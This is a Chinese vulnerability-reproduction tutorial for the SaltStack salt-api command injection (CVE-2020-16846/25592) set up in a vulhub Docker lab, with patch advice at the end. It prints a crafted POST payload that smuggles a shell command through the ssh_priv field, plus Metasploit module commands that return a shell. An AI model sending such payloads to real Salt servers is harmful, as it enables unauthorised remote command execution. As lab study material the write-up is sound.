本篇文章給大家分享的是有關(guān)如何進(jìn)行SaltStack命令注入漏洞復(fù)現(xiàn),小編覺(jué)得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說(shuō),跟著小編一起來(lái)看看吧。
創(chuàng)新互聯(lián)網(wǎng)站建設(shè)由有經(jīng)驗(yàn)的網(wǎng)站設(shè)計(jì)師、開發(fā)人員和項(xiàng)目經(jīng)理組成的專業(yè)建站團(tuán)隊(duì),負(fù)責(zé)網(wǎng)站視覺(jué)設(shè)計(jì)、用戶體驗(yàn)優(yōu)化、交互設(shè)計(jì)和前端開發(fā)等方面的工作,以確保網(wǎng)站外觀精美、成都網(wǎng)站建設(shè)、成都做網(wǎng)站易于使用并且具有良好的響應(yīng)性。
SaltStack是一個(gè)服務(wù)器基礎(chǔ)架構(gòu)集中化管理平臺(tái),具備配置管理、遠(yuǎn)程執(zhí)行、監(jiān)控等功能,基于Python語(yǔ)言實(shí)現(xiàn),結(jié)合輕量級(jí)消息隊(duì)列(ZeroMQ)與Python第三方模塊(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)構(gòu)建。通過(guò)部署SaltStack,我們可以在成千萬(wàn)臺(tái)服務(wù)器上做到批量執(zhí)行命令,根據(jù)不同業(yè)務(wù)進(jìn)行配置集中化管理、分發(fā)文件、采集服務(wù)器數(shù)據(jù)、操作系統(tǒng)基礎(chǔ)及軟件包管理等。
CVE-2020-16846和CVE-2020-25592組合使用可在未授權(quán)的情況下通過(guò)salt-api接口執(zhí)行任意命令。CVE-2020-25592允許任意用戶調(diào)用SSH模塊,CVE-2020-16846允許用戶執(zhí)行任意命令。
SaltStack 2015/2016/2017/2018/2019/3000/3001/3002
1、本次漏洞手動(dòng)搭建較為復(fù)雜,使用vulhub中的docker環(huán)境搭建下載并解壓
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip unzip vulhub-master.zip
2、進(jìn)入漏洞目錄使用docker-compose啟動(dòng)漏洞環(huán)境,看到綠色done表示啟動(dòng)成功
cd vulhub/saltstack/CVE-2020-16846/ docker-compose up -d
3、在瀏覽器訪問(wèn)https://your-ip:8000這是Salt的API端口。注:需要https訪問(wèn)
1、在url訪問(wèn)以下鏈接,使用burp進(jìn)行抓包并發(fā)送到重放模塊
https://your-ip:8000/run
2、將get修改為post傳輸,構(gòu)造以下數(shù)據(jù)包寫入文件,點(diǎn)擊發(fā)送
token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b
3、返回200ok,進(jìn)入到docker容器中查看文件成功寫入
4、使用msf中的exp進(jìn)行漏洞利用,啟動(dòng)msf,選擇攻擊模塊,配置信息,使用run或exploit執(zhí)行,執(zhí)行后拿到shell
msfconsole use exploit/linux/http/saltstack_salt_api_cmd_exec show options
1、建議在官方下載安裝此漏洞補(bǔ)丁,補(bǔ)丁下載地址:
https://gitlab.com/saltstack/open/salt-patches
2、升級(jí)至安全版本,下載地址:
https://repo.saltstack.com/
以上就是如何進(jìn)行SaltStack命令注入漏洞復(fù)現(xiàn),小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見(jiàn)到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。